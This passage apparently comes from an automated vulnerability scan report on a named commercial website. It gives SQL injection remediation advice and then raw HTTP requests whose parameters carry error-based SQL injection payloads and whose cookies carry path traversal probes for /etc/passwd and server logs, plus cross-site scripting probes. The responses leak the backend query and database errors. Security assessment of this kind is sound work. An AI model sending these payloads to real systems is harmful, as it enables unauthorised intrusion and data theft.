  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/wede00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f0g3u77cjctk0d190gr5kae692; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=boqvj6hsv96bp1caprojf29gd0; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/lgds00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 